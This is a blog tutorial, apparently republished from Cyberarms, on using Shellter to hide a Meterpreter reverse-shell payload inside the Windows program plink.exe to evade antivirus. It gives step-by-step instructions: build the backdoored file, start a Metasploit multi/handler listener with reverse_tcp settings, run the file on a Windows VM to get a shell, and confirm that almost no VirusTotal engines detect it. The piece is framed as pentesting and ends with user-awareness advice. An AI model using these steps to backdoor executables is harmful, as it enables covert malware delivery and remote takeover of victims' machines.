CIP Cyber

Bypass an Anti-Virus with Shellter on Kali Linux

Table of Contents

Having trouble getting a Meterpreter shell past that pesky AV? Check out the new Shellter 4.0 shell obfuscation program!
The latest version of Shellter
for pentesters was revealed at B-Sides Lisbon earlier this month.
Updates include increased obfuscation through a custom encoder and
polymorphic decoder. Also this version saves a few steps by including
the most common Meterpreter shells.
Shellter works by taking a legit Windows
.exe file, adds the shell code to it and then does a great job of
modifying the file for AV bypass. The program’s automatic mode makes the
whole process very pain free. In this tutorial I used the latest
version of Kali Linux and a Windows 7 Virtual Machine.
So enough talk, let’s see it in action!
1. Download and install “shellter” (https://www.shellterproject.com/download/ )
**Note: the Kali repos apparently don’t
contain the newest 4.0 version yet. To get the latest, instead of using
‘apt-get install shellter’, just download and extract the ZIP file to
the “/etc/share” folder.
2. Grab “plink.exe” from Kali’s ‘usr/share/windows-binaries’ directory and copy it into the Shellter directory.
3. Start Shellter – ‘shellter’ from the
terminal or use ‘wineconsole shelter’ from ‘/etc/share/shellter’ if you
manually installed.
4. Choose ‘A’ for Automatic Mode
5. At the PE Target Prompt, enter “plink.exe
6. When prompted for Payloads select “L” and then “1”
7. Next, enter the IP address of your Kali system (mine is 192.168.1.39)
8. And the port to use (I used 5555)
Shellter will obfuscate the code and crunch for a while. Then you should see:
Success!
9. Now we need to start a listener service on the Kali system using the same settings from above:
• start Metasploit (‘msfconsole’ in a terminal)
• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set lhost 192.168.1.39
• set lport 5555
• exploit
10. Now that Kali is waiting for a connection. Copy our evil plink.exe command to the Windows 7 system and run it:

And we have a shell!

Compare the size of the backdoored exe to the original one. They are the
exact same size! Now upload the backdoored exe to Virustotal and scan
it for malicious content:

One (!) anti-virus engine detected it as malicious. And it was not a mainstream AV normally found in companies…

Conclusion

As you can see, a backdoored file that
will bypass AV can be created pretty easily. AV is great but it can’t
stop everything, you need to train your company users to be vigilant
when using internet sites, social media and e-mail. Avoid suspicious
websites, don’t allow website popups or warnings to install anything and
never open unsolicited or suspicious attachments in e-mails. If you
don’t know if you should click on something, ask your IT department. A
little user vigilance can go a long way at protecting your network!
The Author:
This wonderful tutorial has been written and first published by Cyberarms.
CIP Cyber Staff

CIP Cyber Staff

CIP Cyber Staff comprises CIP cybersecurity experts committed to delivering comprehensive information on critical infrastructure protection. The content covers diverse topics, equipping professionals to defend organizations and communities in an ever-evolving cyber landscape.

Most popular

Industrial Cybersecurity

Want always be up to date?

Don't miss the latest news

By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.

CIP Training & Certifications

Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings

Related Articles

How to Reset Kali Linux Root Password?

Forgot the Kali Linux root password? Stress not! This tutorial discusses the steps to reset Kali Linux system password. Follow the steps, and you will

Do Hackers Really use Metasploit? NO!

Undoubtedly, Metasploit is one of the most organized, well-developed tools in the pen-testers toolbox. But, do hackers use it? Some of them, but not the

Want always be up to date?

Don't miss the latest news

By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.

CIP Training & Certifications

Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings